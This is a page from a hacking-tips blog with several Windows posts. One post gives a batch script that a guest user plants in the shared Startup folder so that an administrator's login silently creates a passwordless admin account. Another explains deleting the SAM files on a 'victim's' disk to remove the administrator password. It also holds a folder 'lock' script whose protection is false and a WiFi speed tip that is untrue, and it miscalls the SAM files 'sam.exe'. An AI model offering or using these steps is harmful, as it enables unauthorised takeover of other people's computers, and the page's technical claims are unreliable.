Skip to main content

Posts

Showing posts with the label windows

Protect Any Folder Without Any Software

cls @ECHO OFF title promohack.blogspot.com if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST MyFolder goto MDMyFolder :CONFIRM echo Are you sure to lock this folder? (Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock Your Secure Folder set/p "pass=>" if NOT %pass%== promohack goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDMyFolder md MyFolder echo MyFolder created suc...

Easily Remove All Empty Folders From Windows

Today in am posting Tip to Delete all the Empty Folders from Windows. Many times Empty Folders are created by the Applications/Games you have Uninstalled in the Windows. Some times We create a New Folder to keep some new Data in it, But we keep that Data in an other Location, But the Empty Folder is still there. If you have a Large size of Data, then it very Difficult to find every empty folder and to Delete it. So, here is a FREE Software that Delete all the Empty Folder from your Hard-Disk. The name of the Software is :Empty Folder Remover and it very easy to use. Click Here To Download Thank You .

Get Maximum Speed From Public WiFi

If you use a public Wi-Fi network in an Internet cafe, school or your wireless network at home, then you are sharing Wifi with other users also, this is what makes your Internet very slow. Do you ever think that you should disable the internet for all other users, and get the maximum speed from your internet connection. To get on a faster wireless public Internet, follow the following steps: Step 1) Open Device Manager from Control Panel>Hardware, or just right click on Computer and from the menu select "Device Manager". Step 2) Now, Scroll to down and expand list of Network adapters and open your your wireless adapter by double clicking on it. Step 3) Now click on the Advanced tab to see all available changes. Step 4) From the property select "Speed ​​& Duplex". Now change it's value from Auto-negotiation to "1.0 Gbps full duplex". Step 5) Now press OK to accept the settings, Now restart your computer. now you ar...

Create An Admin Account Using Guest Account

Hello Friend's,  I am back How to create an Admin account From a Guest Account intresting right..? Creating an administrator account from guest account is very easy and simple. You just need to use your guest account and create one administrator account instantly.           1) . Open Notepad, paste the following :                @echo off                net user Newadmin /add /expires:never /passwordreq:no                net localgroup “Administrators” /add Newadmin           2) . Save it as a .bat file.           3) . Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup  Now when your admin logs into the system, the  new account will be automatically  created without knowing the admin .Now next time when you will log...

Delete administrator Password without any software

Method 1 Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind. Method 2 Step  1.   Put your hard disk of your computer in any other pc . Step 2.   Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ). Step 3.   Then open that drive in which the victim’s window(or your window) is installed. Step 4.   Go to location  windows->system32->config Step 5.   And delete SAM.exe and SAM.log  Step 6.   Now remove hard disk and put in your computer. Step  7.   And boot your computer  Your Done. Thank You. Dare To Comment.